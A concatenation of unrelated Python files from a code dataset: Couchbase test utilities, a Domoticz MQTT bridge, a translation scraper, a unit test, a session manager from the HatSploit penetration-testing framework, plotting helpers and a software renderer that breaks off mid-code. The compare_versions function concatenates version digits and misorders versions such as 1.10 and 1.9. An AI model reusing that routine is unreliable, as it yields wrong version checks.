net45/LiteServ.exe, for 1.4.0, there is no net45\n ]\n\n for i in version_prefixes:\n if version.startswith(i):\n return False\n\n return True\n\n\ndef compare_versions(version_one, version_two):\n \"\"\" Checks two version and returns the following:\n\n Version should be of the following formats 1.4.2 or 1.4.1\n\n if version_one == version two, return 0\n if version_one < version_two, return -1,\n if version_one > version_two, return 1\n \"\"\"\n\n # Strip build number if present, 1.4.1-345 -> 1.4.1\n version_one = version_one.split('-')[0]\n version_two = version_two.split('-')[0]\n\n # Strip '.' and convert to integers\n version_one_number_string = version_one.replace('.', '')\n version_two_number_string = version_two.replace('.', '')\n\n version_one_number_string_len = len(version_one_number_string)\n version_two_number_string_len = len(version_two_number_string)\n\n # Handle the case where 1.4 and 1.4.0 should be equal\n # by padding 0s on the right of the shorter number\n difference = abs(version_one_number_string_len - version_two_number_string_len)\n if difference != 0 and version_one_number_string_len < version_two_number_string_len:\n for _ in range(difference):\n version_one_number_string += \"0\"\n if difference != 0 and version_one_number_string_len > version_two_number_string_len:\n for _ in range(difference):\n version_two_number_string += \"0\"\n\n version_one_number = int(version_one_number_string)\n version_two_number = int(version_two_number_string)\n\n if version_one_number < version_two_number:\n return -1\n\n if version_one_number > version_two_number:\n return 1\n\n # All components are equal\n return 0\n\n\ndef check_xattr_support(server_version, sync_gateway_version):\n if compare_versions(server_version, '5.0.0') < 0:\n raise FeatureSupportedError('Make sure you are using Coucbhase Server 5.0+ for xattrs')\n if compare_versions(sync_gateway_version, '1.5') < 0:\n raise FeatureSupportedError('Make sure you are using Coucbhase Sync Gateway 1.5+ for xattrs')\n\n\ndef add_cbs_to_sg_config_server_field(cluster_config):\n \"\"\" This method get all CBS servers ips from cluster config and\n it as server in sync gateway config file . Each ip is seperated\n by comma\n Format of server file in sync-gateway config if there are 3 couchbase servers\n server: \"http://xxx.xxx.xx.xx,xx1.xx1.x1.x1,xx2,xx2,x2,x2:8091 \"\"\"\n couchbase_server_primary_node = \"\"\n sg_version = get_sg_version(cluster_config)\n cbs_servers = get_cbs_servers(cluster_config)\n if compare_versions(sg_version, '1.5') < 0:\n couchbase_server_primary_node = cbs_servers[0]\n else:\n for i in range(len(cbs_servers)):\n couchbase_server_primary_node = couchbase_server_primary_node + cbs_servers[i]\n if (i + 1) < len(cbs_servers):\n couchbase_server_primary_node = couchbase_server_primary_node + \",\"\n\n return couchbase_server_primary_node\n","sub_path":"keywords/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"238776836","text":"import argparse\nimport time\nimport requests\nimport logging\nimport random\nimport json\nfrom paho.mqtt import client as mqtt_client\n\n\nlogging.basicConfig(level=logging.DEBUG, format=\"[%(module)s] %(message)s\")\nlog = logging.getLogger(__name__)\n\n\ndef get_response(url):\n headers = {'Content-Type': 'application/json'}\n session = requests.Session()\n\n response = session.request(\n method='GET',\n url=url,\n headers=headers,\n timeout=8\n )\n\n log.debug(f'Response status: {response}')\n\n return response.json() # dict()\n\n\ndef fresh_list_full():\n # подробный список актуальных датчиков\n url = f'http://{_url}/json.htm?type=devices'\n fresh_info = get_response(url)\n\n list_accs = []\n try:\n for acc in fresh_info['result']:\n list_accs.append(acc)\n except Exception:\n pass\n\n return list_accs\n\n\ndef _value(_data, _type):\n if _type == 'Temp':\n value = float(_data.split(' ')[0])\n elif _type == 'Humidity':\n value = float(_data.split(' ')[1])\n elif _type == 'Light/Switch':\n if _data == 'Off':\n value = 'false'\n else:\n value = 'true'\n else:\n value = None\n\n return value\n\n\ndef form_dom_humidity(acc_info, idx, get_topic):\n return {\n \"topic\": f\"humidity/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"humiditysensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"humiditysensor\",\n \"feature\": {\n \"currentrelativehumidity\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"humidity/idx{idx}/currentrelativehumidity/set\"\n }\n }\n }\n\n\ndef form_dom_temperature(acc_info, idx, get_topic):\n return {\n \"topic\": f\"temperature/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"temperaturesensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"temperaturesensor\",\n \"feature\": {\n \"currenttemperature\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"temperature/idx{idx}/currenttemperature/set\"\n }\n }\n }\n\n\ndef form_dom_motion(acc_info, idx, get_topic):\n return {\n \"topic\": f\"motion/idx{idx}\",\n \"name\": acc_info[\"Name\"],\n \"manufacturer\": \"DIY\",\n \"model\": \"motionsensor\",\n \"serialNumber\": f'{acc_info[\"ID\"]}_{idx}',\n \"type\": \"motionsensor\",\n \"feature\": {\n \"motiondetected\": {\n \"getTopic\": get_topic,\n \"setTopic\": f\"motion/idx{idx}/motiondetected/set\"\n }\n }\n }\n\n\ndef convert_dom(dev_data):\n _type = dev_data['Type']\n idx = dev_data['idx']\n\n if _type == 'Humidity':\n get_topic = f'humidity/idx{idx}/currentrelativehumidity/get'\n _form = form_dom_humidity(dev_data, idx, get_topic)\n elif _type == 'Temp':\n get_topic = f'temperature/idx{idx}/currenttemperature/get'\n _form = form_dom_temperature(dev_data, idx, get_topic)\n elif _type == 'Light/Switch':\n get_topic = f'motion/idx{idx}/motiondetected/get'\n _form = form_dom_motion(dev_data, idx, get_topic)\n else:\n return None, None, None, None\n\n return _form, _type, get_topic, idx\n\n\ndef connect_mqtt():\n def on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected to MQTT Broker!\")\n else:\n print(\"Failed to connect, return code %d\\n\", rc)\n\n client = mqtt_client.Client(client_id)\n client.username_pw_set(username, password)\n client.on_connect = on_connect\n client.connect(broker, port)\n return client\n\n\ndef publish(client):\n\n while True:\n time.sleep(3)\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n\n list_accs = fresh_list_full()\n if list_accs:\n\n for acc in list_accs:\n msg, _type, get_topic, idx = convert_dom(acc)\n announce_topic = f'announce/idx{idx}/'\n\n if _type:\n # отправка анонса\n result = client.publish(announce_topic, str(msg).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{msg}` to topic `{announce_topic}`\")\n\n # отправка значения\n msg = _value(acc['Data'], _type)\n result = client.publish(\n get_topic, str(msg).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{msg}` to topic `{get_topic}`\")\n else:\n log.info(\n f\"Failed to send message to topic {get_topic}\")\n\n else:\n log.info(f\"Failed to send message to topic {announce_topic}\")\n\n else:\n log.info(f\"No active devices\")\n\n # = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =\n\n\ndef subscribe(client: mqtt_client):\n def on_message(client, userdata, msg):\n str_msg = msg.payload.decode()\n dict_msg = json.loads(str_msg)\n\n try:\n type_access = dict_msg['dtype']\n _idx = dict_msg['idx']\n\n try:\n value = float(dict_msg['nvalue'])\n except Exception:\n value = dict_msg['nvalue']\n\n except Exception as exp:\n log.error(exp)\n type_access = None\n\n if type_access:\n if type_access == 'Temp':\n get_topic = f'temperature/idx{_idx}/currenttemperature/get'\n elif type_access == 'Humidity':\n get_topic = f'humidity/idx{_idx}/currentrelativehumidity/get'\n elif type_access == 'Light/Switch':\n get_topic = f'motion/idx{_idx}/motiondetected/get'\n else:\n get_topic = None\n\n if get_topic:\n result = client.publish(get_topic, str(value).replace(\"'\", '\"'), retain=True)\n status = result[0]\n\n if status == 0:\n log.info(f\"Send `{value}` to topic `{get_topic}`\")\n else:\n log.info(f\"Failed to send message to topic {get_topic}\")\n\n else:\n pass\n\n client.subscribe(topic)\n client.on_message = on_message\n\n\ndef pub():\n client = connect_mqtt()\n client.loop_start()\n subscribe(client)\n publish(client)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-u\", \"--username\", type=str, help=\"mqtt username\")\n parser.add_argument(\"-p\", \"--password\", type=str, help=\"mqtt password\")\n parser.add_argument(\"-b\", \"--broker\", type=str, help=\"ip mqtt broker\") # \"192.168.0.74\"\n parser.add_argument(\"-s\", \"--port\", type=str, help=\"port mqtt broker\") # \"1883\"\n parser.add_argument(\"-t\", \"--topic\", type=str, help=\"mqtt topic domoticz\") # \"domoticz/#\"\n parser.add_argument(\"-h\", \"--host\", type=str, help=\"host domoticz [host:port]\") # \"Host:Port\"\n args = parser.parse_args()\n\n client_id = f'python-mqtt-{random.randint(0, 1000)}'\n username = args.username\n password = args.password\n broker = args.broker\n port = int(args.port)\n topic = args.topic\n _url = args.host\n\n pub()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"654533752","text":"import requests\r\nimport json\r\n\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nHEADERS = {\r\n \"User-Agent\": \"Mozilla/5.0\",\r\n \"Content-Type\": \"application/json; charset=UTF-8\"\r\n}\r\n\r\nclass ReversoContextAPI(object):\r\n \r\n def __init__(self, source_text=\"я люблю кошек\", target_text=\"\", source_lang=\"ru\", target_lang=\"en\"):\r\n self.data = {\r\n \"source_text\": source_text,\r\n \"target_text\": target_text,\r\n \"source_lang\": source_lang,\r\n \"target_lang\": target_lang,\r\n \"npage\": 1,\r\n \"mode\": 0\r\n }\r\n self.page_count = requests.post(\"https://context.reverso.net/bst-query-service\", headers=HEADERS, data=json.dumps(self.data)).json()[\"npages\"]\r\n\r\n def get_page(self, npage):\r\n data = self.data.copy()\r\n data[\"npage\"] = npage\r\n return requests.post(\"https://context.reverso.net/bst-query-service\", headers=HEADERS, data=json.dumps(data)).json()[\"list\"]\r\n\r\n def get_results_pair_by_pair(self):\r\n for npage in range(1, self.page_count + 1):\r\n for word in self.get_page(npage):\r\n yield (BeautifulSoup(word[\"s_text\"]).text, BeautifulSoup(word[\"t_text\"]).text)\r\n\r\n def get_results(self):\r\n return [pair for pair in self.get_results_pair_by_pair()]\r\n \r\nif __name__ == \"__main__\":\r\n api = ReversoContextAPI(\r\n input(\"Enter the source text to search... \"),\r\n input(\"Enter the target text to search (optional)... \"),\r\n input(\"Enter the source language code... \"),\r\n input(\"Enter the target language code... \")\r\n )\r\n results = api.get_results_pair_by_pair()\r\n for pair in results:\r\n print(pair[0], \"=\", pair[1])\r\n","sub_path":"context/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"560146007","text":"# Copyright 2021 Zilliz. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport unittest\nfrom queue import Queue\n\nfrom towhee.dataframe import DataFrame, Variable\nfrom towhee.engine._operator_io import MapDataFrameReader\n\nfrom towhee.tests.test_util.dataframe_test_util import DfWriter, MultiThreadRunner\n\n\nclass TestOperatorIO(unittest.TestCase):\n \"\"\"\n op_ctx IO test\n \"\"\"\n\n def test_map_reader(self):\n df = DataFrame('test')\n data = (Variable('int', 1), Variable(\n 'str', 'test'), Variable('float', 0.1))\n t = DfWriter(df, 10, data=data)\n t.start()\n t.join()\n\n map_reader = MapDataFrameReader(df, {'v1': 0, 'v2': 2})\n self.assertEqual(map_reader.size, 10)\n count = 0\n while True:\n item = map_reader.read()\n if not item:\n break\n self.assertEqual(item, {'v1': 1, 'v2': 0.1})\n count += 1\n self.assertEqual(count, 10)\n df.seal()\n self.assertEqual(map_reader.read(), None)\n\n def test_map_reader_multithread(self):\n df = DataFrame('test')\n data = (Variable('int', 1), Variable(\n 'str', 'test'), Variable('float', 0.1))\n data_size = 100\n t = DfWriter(df, data_size, data=data)\n t.set_sealed_when_stop()\n t.start()\n map_reader = MapDataFrameReader(df, {'v1': 0, 'v2': 2})\n\n q = Queue()\n\n def read(map_reader: MapDataFrameReader, q: Queue):\n while True:\n item = map_reader.read()\n if item:\n q.put(item)\n continue\n elif item is None:\n break\n else:\n pass\n\n runner = MultiThreadRunner(\n target=read, args=(map_reader, q), thread_num=10)\n\n runner.start()\n runner.join()\n\n count = 0\n while not q.empty():\n self.assertEqual(q.get(), {'v1': 1, 'v2': 0.1})\n count += 1\n self.assertEqual(count, data_size)\n","sub_path":"towhee/tests/dataframe/test_operator_io.py","file_name":"test_operator_io.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"436687782","text":"#!/usr/bin/env python3\n\n#\n# MIT License\n#\n# Copyright (c) 2020-2021 EntySec\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\nfrom hatsploit.lib.storage import LocalStorage\nfrom hatsploit.core.cli.badges import Badges\n\n\nclass Sessions:\n def __init__(self):\n self.badges = Badges()\n self.local_storage = LocalStorage()\n\n def get_all_sessions(self):\n sessions = self.local_storage.get(\"sessions\")\n return sessions\n\n def add_session(self, session_platform, session_type, session_host, session_port, session_object):\n if not self.local_storage.get(\"sessions\"):\n self.local_storage.set(\"sessions\", dict())\n\n session_id = 0\n if session_platform in self.local_storage.get(\"sessions\").keys():\n sessions = self.local_storage.get(\"sessions\")\n session_id = len(sessions[session_platform])\n sessions[session_platform][int(session_id)] = {\n 'type': session_type,\n 'host': session_host,\n 'port': session_port,\n 'object': session_object\n }\n else:\n sessions = {\n session_platform: {\n int(session_id): {\n 'type': session_type,\n 'host': session_host,\n 'port': session_port,\n 'object': session_object\n }\n }\n }\n\n self.local_storage.update(\"sessions\", sessions)\n return session_id\n\n def check_exist(self, session_platform, session_id, session_type=\"\"):\n sessions = self.local_storage.get(\"sessions\")\n if sessions:\n if session_platform in sessions.keys():\n if int(session_id) in sessions[session_platform].keys():\n if session_type:\n if sessions[session_platform][int(session_id)]['type'] == session_type:\n return True\n return False\n return True\n return False\n\n def spawn_interactive_connection(self, session_platform, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n self.badges.output_process(\"Interacting with session \" + str(session_id) + \"...\")\n self.badges.output_success(\"Interactive connection spawned!\")\n self.badges.output_information(\"Type commands below.\\n\")\n\n sessions[session_platform][int(session_id)]['object'].interact()\n else:\n self.badges.output_error(\"Invalid session given!\")\n\n def close_session(self, session_platform, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n try:\n sessions[session_platform][int(session_id)]['object'].close()\n del sessions[session_platform][int(session_id)]\n\n if not sessions[session_platform]:\n del sessions[session_platform]\n self.local_storage.update(\"sessions\", sessions)\n except Exception:\n self.badges.output_error(\"Failed to close session!\")\n else:\n self.badges.output_error(\"Invalid session given!\")\n\n def get_session(self, session_platform, session_type, session_id):\n sessions = self.local_storage.get(\"sessions\")\n if self.check_exist(session_platform, session_id):\n if session_type == sessions[session_platform][int(session_id)]['type']:\n return sessions[session_platform][int(session_id)]['object']\n self.badges.output_error(\"Session with invalid type!\")\n return None\n return None\n","sub_path":"hatsploit/lib/sessions.py","file_name":"sessions.py","file_ext":"py","file_size_in_byte":4796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"387175072","text":"from datetime import datetime\n#numbers = [1, 30, 32, 500, 560, 679, 2300, 2344, 4, 12, 3431, 50392, 3322, 31415, 314, 4324, 4214, 42222, 59129, 10501, 35,67,888,2,3,5,6,7,15,18]\nnumbers = []\nfor i in range(1000000):\n numbers.append(i)\n\nnum = int(input(\"검색할 숫자를 입력하세요: \"))\nsearch_count = 0\nnumbers.sort() #자동 정렬\n\nprint(\"\\n다음의 배열들에서 숫자{}를 검색합니다.: \".format(num))\nprint(numbers)\nprint(\"\\n\\n\\n\")\n\nsearch_ok = False\n\ntime_now = datetime.now()\nfor i in range(len(numbers)):\n search_count+= 1\n if (numbers[i] == num):\n print(\"{}를 기본 주어진 배열에서 {}번째 검색만에 찾았습니다.\".format(num, search_count))\n search_ok = True\n break\n print(\"[검색중][{}번째 검색] 남은 검색할 항목 갯수: {}개 남았습니다.\".format(search_count, len(numbers) - search_count))\ntime_end = datetime.now()\ndelta = time_end - time_now\n\nif (search_ok == False):\n print(\"{}를 기본 주어진 배열에서 {}번 검색했지만 찾지 못했습니다..\".format(num, search_count))\nprint(\"검색 작업 실행시간: {}\".format(delta))","sub_path":"noefficient_search.py","file_name":"noefficient_search.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"649551780","text":"import os, sys\nimport matplotlib.pyplot as plt\n\nfrom bokeh.plotting import figure, output_file, show, save\n\nLOSS_OVER_N_EPOCHS_DICT_KEYS = [\"train_loss\", \"test_loss\"]\nSCORE_KEY_MAP = {'precision': 0, 'recall': 1, 'f1': 2}\n\ndef validate_loss_over_n_dict_keys(loss_over_n_epochs: dict):\n assert all([key in LOSS_OVER_N_EPOCHS_DICT_KEYS for key in loss_over_n_epochs.keys()])\n\n\ndef plot_loss_over_n_epochs(loss_over_n_epochs: dict,\n title=None,\n file_path=None,\n hard_key = None,\n fig_size: tuple = (10, 6)):\n\n# validate_loss_over_n_dict_keys(loss_over_n_epochs)\n fig = plt.figure(figsize=fig_size)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Epochs')\n ax.set_ylabel('Loss')\n if title:\n ax.set_title(title)\n \n if hard_key is None:\n hard_key = next(iter(loss_over_n_epochs.keys()))\n n_epochs = len(loss_over_n_epochs[hard_key])\n\n for key in loss_over_n_epochs:\n # If nothing to plot just skip that split.\n if len(loss_over_n_epochs[key]) == 0:\n continue\n ax.plot(range(1, n_epochs + 1), loss_over_n_epochs[key], label=key)\n\n plt.legend()\n\n if file_path:\n file_path = os.path.join(PLOTTING_ROOT, file_path)\n print(\"File Path: \", file_path)\n fig.savefig(file_path)\n\n plt.show()\n\n\ndef plot_score_over_n_epochs(scores_over_n_epochs: dict,\n score_type='f1',\n title=None,\n file_path=None,\n fig_size: tuple = (10, 6)):\n assert score_type in SCORE_KEY_MAP.keys(), \"Invalid Score type.\"\n\n fig = plt.figure(figsize=fig_size)\n ax = fig.add_subplot(111)\n ax.set_xlabel('Epochs')\n ax.set_ylabel('{} Score'.format(score_type))\n if title:\n ax.set_title(title)\n\n f1_score_key = SCORE_KEY_MAP[score_type]\n\n first_key = next(iter(scores_over_n_epochs.keys()))\n n_epochs = len(scores_over_n_epochs[first_key])\n\n for key in scores_over_n_epochs:\n f1_score = []\n if len(scores_over_n_epochs[key]) == 0:\n continue\n for epoch in range(n_epochs):\n f1_score.append(scores_over_n_epochs[key][epoch][f1_score_key])\n\n ax.plot(range(1, n_epochs + 1), f1_score, label=key)\n\n plt.legend()\n plt.show()\n\ndef get_empty_stat_over_n_epoch_dictionaries():\n loss_over_epochs = {\n \"train_loss\": [],\n \"val_loss\": [],\n \"test_loss\": []\n }\n\n scores_over_epochs = {\n \"train_scores\": [],\n \"val_scores\": [],\n \"test_scores\": [],\n \"overall_scores\": []\n }\n\n return loss_over_epochs, scores_over_epochs\n\n\ndef plot_line_chart_using_bokeh(x_axis_data: list, y_axis_data: list, colors: list,\n title: str, output_file_name: str,\n plot_height=350, plot_width=800,\n line_alpha=0.5, line_width=1,\n x_label='Time', y_label='Value',\n show_fig=True):\n assert len(x_axis_data) == len(y_axis_data) and len(x_axis_data) == len(\n y_axis_data), \"Length miss-match for x-axis or y-axis data.\"\n\n p = figure(x_axis_type=\"datetime\", title=title, plot_height=plot_height, plot_width=plot_width)\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_alpha = 0.5\n p.xaxis.axis_label = x_label\n p.yaxis.axis_label = y_label\n p.multi_line(x_axis_data, y_axis_data, line_color=colors, line_width=line_width, line_alpha=line_alpha)\n output_file(output_file_name)\n if show_fig:\n show(p)","sub_path":"S19 VQA/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":3688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"463998250","text":"\"\"\"\nMaria Ines Vasquez Figueroa\n18250\nGráficas\nProyecto Software Rendering\nFunciones\n\"\"\"\nimport struct\nfrom obj import Obj\nimport random\nfrom numpy import cos, sin, tan, matrix\nimport numpy as np\n\"\"\"\nCarlos nos permitio usar numpy para las operaciones de cos, sin, tan y transformar de grados a radianes, todas las otras operaciones matematica\nfueron sustituidas y creadas por mi.\n\"\"\"\n\n\ndef char(c):\n # 1 byte\n return struct.pack('=c', c.encode('ascii'))\n\ndef word(w):\n # 2 bytes\n return struct.pack('=h',w)\n\ndef dword(d):\n # 4 bytes\n return struct.pack('=l',d)\n\ndef color(r, g, b):\n #return bytes([b, g, r])\n try:\n return bytes([int(b * 255), int(g * 255), int(r * 255)])\n except:\n pass\ndef baryCoords(Ax, Bx, Cx, Ay, By, Cy, Px, Py):\n # u es para la A, v es para B, w para C\n try:\n u = ( ((By - Cy)*(Px - Cx) + (Cx - Bx)*(Py - Cy) ) /\n ((By - Cy)*(Ax - Cx) + (Cx - Bx)*(Ay - Cy)) )\n\n v = ( ((Cy - Ay)*(Px - Cx) + (Ax - Cx)*(Py - Cy) ) /\n ((By - Cy)*(Ax - Cx) + (Cx - Bx)*(Ay - Cy)) )\n\n w = 1 - u - v\n except:\n return -1, -1, -1\n\n return u, v, w\n\n\nBLACK = color(0,0,0)\nWHITE = color(1,1,1)\n\nclass Render(object):\n def __init__(self, width, height): #funncion que actua como el glInit\n #self.glInit(width, height)\n self.curr_color = WHITE\n self.curr_color_bg=BLACK\n self.glCreateWindow(width, height)\n self.lightx=1\n self.lighty=0\n self.lightz=1\n self.active_texture = None\n self.active_normalMap = None\n self.active_texture2 = None\n self.active_shader = None\n \"\"\"self.camPosition=(0,0,0)\n self.camRotation=(0,0,0)\"\"\"\n self.createViewMatrix()\n self.createProjectionMatrix()\n \n def createViewMatrix(self, camPosition = (0,0,0), camRotation = (0,0,0)):\n camMatrix = self.createObjectMatrix( translate = camPosition, rotate = camRotation)\n self.viewMatrix=self.getMatrixInverse(camMatrix)\n \"\"\"print(self.viewMatrix)\n print(np.linalg.inv(matrix(camMatrix)))\n print(\"-----------\")\"\"\"\n \n\n #funciones para sacar inversa de la matriz extraido de: https://stackoverflow.com/questions/32114054/matrix-inversion-without-numpy, editado por mi para acomodarlo al proyecto\n def transposeMatrix(self, m):\n a=[[0,0,0,0],[0,0,0,0],[0,0,0,0],[0,0,0,0]]\n for i in range(0, 4):\n for j in range(0, 4):\n a[j][i]=m[i][j]\n return a\n\n def getMatrixMinor(self,m,i,j):\n return [row[:j] + row[j+1:] for row in (m[:i]+m[i+1:])]\n\n def getMatrixDeternminant(self, m):\n #base case for 2x2 matrix\n if len(m) == 2:\n return m[0][0]*m[1][1]-m[0][1]*m[1][0]\n\n determinant = 0\n for c in range(len(m)):\n determinant += ((-1)**c)*m[0][c]*self.getMatrixDeternminant(self.getMatrixMinor(m,0,c))\n return determinant\n\n def getMatrixInverse(self, m):\n determinant = self.getMatrixDeternminant(m)\n #special case for 2x2 matrix:\n if len(m) == 2:\n return [[m[1][1]/determinant, -1*m[0][1]/determinant],\n [-1*m[1][0]/determinant, m[0][0]/determinant]]\n\n #find matrix of cofactors\n cofactors = []\n for r in range(len(m)):\n cofactorRow = []\n for c in range(len(m)):\n minor = self.getMatrixMinor(m,r,c)\n cofactorRow.append(((-1)**(r+c)) * self.getMatrixDeternminant(minor))\n cofactors.append(cofactorRow)\n cofactors = self.transposeMatrix(cofactors)\n for r in range(len(cofactors)):\n for c in range(len(cofactors)):\n cofactors[r][c] = cofactors[r][c]/determinant\n return cofactors\n\n def lookAt(self, eye, camPosition = (0,0,0)):\n\n \"\"\"print(camPosition)\n print(eye)\n print(np.subtract(camPosition, eye))\n print(\"+++++++++++++++++++++\")\"\"\"\n \"\"\"print(\"resta mia\")\n print(self.subtract(camPosition[0],eye[0],camPosition[1],eye[1],camPosition[2],eye[2]))#funciona\"\"\"\n #forward = np.subtract(camPosition, eye)\n pforward=self.subtract(camPosition[0],eye[0],camPosition[1],eye[1],camPosition[2],eye[2])\n pforward=self.division(pforward, self.frobenius(pforward))#si funciona ya\n \"\"\"print(\"resta numpy\")\n print(np.subtract(camPosition, eye))\n print(\"normal\")\n print(np.linalg.norm(forward))\"\"\"\n \n #forward = forward / np.linalg.norm(forward)\n \"\"\"print(\"resta numpy/normal\")\n print(forward)\n print(\"mi forward\")\n print(pforward)\"\"\"\n \n \"\"\"print(\"cross con numpy\")\n print(np.cross(V3(0,1,0), forward))\n print(\"mi cross\")\n print(self.cross((0,1,0),forward))\n right = np.cross(V3(0,1,0), forward)\n print(\"right/normal numpy\")\n right = right / np.linalg.norm(right)\n print(right)\n print(\"mi version\")\"\"\"\n pright=self.division(self.cross((0,1,0),pforward), self.frobenius(pforward))\n #print(pright)\n\n \"\"\"up = np.cross(forward, right)\n up = up / np.linalg.norm(up)\"\"\"\n pup=self.cross(pforward, pright)\n pup=self.division(pup, self.frobenius(pup))\n #print(pup)\n\n camMatrix = [[pright[0], pup[0], pforward[0], camPosition[0]],\n [pright[1], pup[1], pforward[1], camPosition[1]],\n [pright[2], pup[2], pforward[2], camPosition[2]],\n [0,0,0,1]]\n\n \n self.viewMatrix=self.getMatrixInverse(camMatrix)\n #self.viewMatrix=camMatrix\n \n \n #Inicializa objetos internos\n def glInit(self, width, height):\n #esto se establece ahora en la funcion glCreatWindow\n \"\"\"self.width = width\n self.height = height\"\"\"\n self.curr_color = WHITE\n self.curr_color_bg=BLACK\n self.glCreateWindow(width, height)\n \"\"\"self.glClearColor(red, green, blue)\n self.glClear()\"\"\"\n\n #inicializa framebuffer\n def glCreateWindow(self, width, height):\n self.width = width\n self.height = height\n self.glClear()\n self.glViewPort(0, 0, width, height)\n\n #define area de dibujo\n def glViewPort(self, x, y, width, height):\n self.vportwidth = width\n self.vportheight = height\n self.vportx = x\n self.vporty = y\n #matriz del viewport para crear camara\n self.viewportMatrix = [[width/2, 0, 0, x + width/2],\n [0, height/2, 0, y + height/2],\n [0, 0, 0.5, 0.5],\n [0, 0, 0, 1]]\n \n def createProjectionMatrix(self, n = 0.1, f = 1000, fov = 60):\n\n t = tan((fov * np.pi / 180) / 2) * n\n r = t * self.vportwidth / self.vportheight\n\n self.projectionMatrix = [[n / r, 0, 0, 0],\n [0, n / t, 0, 0],\n [0, 0, -(f+n)/(f-n), -(2*f*n)/(f-n)],\n [0, 0, -1, 0]] \n #cambia el color con el que se llena el mapa de bits (fondo)\n def glClearColor(self, red, green, blue):\n nred=int(255*red)\n ngreen=int(255*green)\n nblue=int(255*blue)\n self.curr_color_bg = color(nred, ngreen, nblue)\n\n #llena el mapa de bits de un solo color predeterminado antes\n def glClear(self):\n self.pixels = [ [ self.curr_color_bg for x in range(self.width)] for y in range(self.height) ]\n #Z - buffer, depthbuffer, buffer de profudidad\n self.zbuffer = [ [ float('inf') for x in range(self.width)] for y in range(self.height) ]\n\n \n #dibuja el punto en relación al viewport\n def glVertex(self, x, y):\n nx=int((x+1)*(self.vportwidth/2)+self.vportx)\n ny=int((y+1)*(self.vportheight/2)+self.vporty)\n\n if nx >= self.width or nx < 0 or ny >= self.height or ny < 0:\n return\n try:\n self.pixels[ny][nx] = self.curr_color\n except:\n pass\n \n #cambia de color con el que se hará el punto con parametros de 0-1\n def glColor(self, red, green, blue):\n nred=int(255*red)\n ngreen=int(255*green)\n nblue=int(255*blue)\n self.curr_color = color(nred, ngreen, nblue)\n \n def glVertex_coord(self, x,y, color = None):#helper para dibujar puntas en la funcion de glLine, \n #ahora mejorado para solo dibujar cuando no hay nada abajo ya dibujado, más eficiente\n if x < self.vportx or x >= self.vportx + self.vportwidth or y < self.vporty or y >= self.vporty + self.vportheight:\n return\n if x >= self.width or x < 0 or y >= self.height or y < 0:\n return\n try:\n self.pixels[y][x] = color or self.curr_color\n except:\n pass\n\n\n #escribe el archivo de dibujo\n def glFinish(self, filename):\n archivo = open(filename, 'wb')\n\n # File header 14 bytes\n #f.write(char('B'))\n #f.write(char('M'))\n\n archivo.write(bytes('B'.encode('ascii')))\n archivo.write(bytes('M'.encode('ascii')))\n\n archivo.write(dword(14 